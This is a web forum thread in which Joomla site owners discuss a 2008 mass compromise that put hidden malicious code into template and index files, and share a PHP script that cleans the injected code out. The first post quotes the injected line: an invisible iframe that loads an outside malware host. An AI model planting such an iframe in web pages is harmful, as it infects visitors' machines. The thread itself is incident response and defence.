Code Injection in the index.php

[metemelek]

Hi Folks

Today i have seen this code after the <body> tags "<iframe src="http://xmanages.cn/in" width=1 height=1 style="visibility: hidden"></iframe>" in the files of

Public_html/index.php
Public_html/templates/all of templates/index.php
Public_html/administrator/index.php
Public_html/administrator/templates/joomla_admin/index.php

How did they inject it. have you ever seen such a malware code. Is there anyone loks can help me with this trouble?

Have a nice day.

[dhuelsmann]

I suggest you start here http://docs.joomla.org/Joomla_Administr ... _Checklist
and then here http://forum.joomla.org/viewtopic.php?f=267&t=112604

[leroy]

There is a major hack going down, inserting code snippets into the joomla template index files. All my sites have been compromised, first time in 4 years.

The code snip I am finding is the hu1-hu1.cn hack. I think they are getting in through the php engine. Bad.

[stackedsax]

I have run into the same thing. Anyone figured out how they're doing it yet? I'm working on just removing the crap from my php, html and htm files. Will let you know if I find a pleasant way of doing it without disturbing all the files too much.

[mandville]

here is my thinking on how I would do it,
.try and POST to the 777 permissions template folder a pre injected version of the template
.move on to the next place.

[stackedsax]

Sorry, I'd fixed my stuff but hadn't given back.

Here's some code I sniped from another forum and then modified to suit me.

Code: Select all

<?php
// 23/8/2008 <unknown name yet> exploit clean
// Written by [email protected] and modified to please stackedsax

// Get all files under the 'public_html' directory -- change accordingly
$command = shell_exec('find public_html -iname "*.php" -o -iname "*.html" -o -iname "*.htm" -o -iname "*.tpl"');
$lines = explode("\n", $command);
array_pop($lines); //Just to get rid of the final \n...

foreach($lines as $line)
{

  // Get current contents of file
  $contents = file_get_contents($line);

  // Clean exploit code
  //  print "Cleaning file: $line\n";
  $pattern = '|<html> <body><script>var source ="=jgs.*\ndocument.write.*</script>\s*\n\s*</html> </body>|ms';
  $clean_contents = preg_replace($pattern, '', $contents);
  $clean_contents = str_replace("</html>  </body>", "</html>", $clean_contents);


  // Write cleaned contents
  $file = fopen($line, w);
  fwrite($file, $clean_contents);
  fclose($file);

}

?>

Save the code as a php file like 'cleanThatCrap.php' and run at the command line:

Code: Select all

> php cleanThatCrap.php

Of course, you should back up your hacked files before you blindly run my code....

I think I could have done it a line or two quicker, but by the time I thought about it, I'd cleaned my files, so I never got to refining it any further. For instance, I think the only replacement you need is actually something more like:

Code: Select all

  $pattern = '|<html> <body><script>var source ="=jgs.*</body>|ms';

I was just being overly specific and as a consequence need a str_replace in there too...

Whatever works for you guys.

[leroy]

It appears that the code snippet was part of a much more sophisticated exploit that infected many servers from the server farm I lease from, and has nothing specifically to do with joomla. I believe the compromise was at the administrative level of the server farm, they may have got the root passwords, I don't think there was anyway to defend against it on the code level.

I was able to clean up about 40,000 files on my server with a combination of scripts and PowerGREP. I described the problem to one of my consultants and he immediately new the server farm name without my telling him, so that was the smoking gun. When I finally got the farm techs to fill me in on the scale of the compromise, it was clear that just cleaning the snippets was the least of my problems. The list of exploits was pages long and quite sophisticated. The server was so fully compromised that I would never be confident of it again. So I bit the bullet and reloaded the server, doing 2 years of work in 48 hours. Having the old drive slaved to the new one helped, I will reformat as soon as possible.

[stackedsax]

Yes, you are correct, from what I've read elsewhere, people were claiming that this was part of a root attack. The code I posted is only to clean the affected files so that your websites might work.

In the meantime, other evasive action is certainly required... backup, move to a more hardened server, change passwords.... all the usual.

[vikki237]

just change the permissions of file .htaccess to read only and also of the front index.php+ index.html files to read only.....

[mandville]

just change the permissions of file .htaccess to read only and also of the front index.php+ index.html files to read only.....

woithout knowing what actually happened, this information is a bit to vague.

[tamilmaran]

i host my site in hosting server so, shell access is not possible , it is possible to run recursively on all folder PHP file & clean some base64 code injection from my php files
Help me
Thanks in advance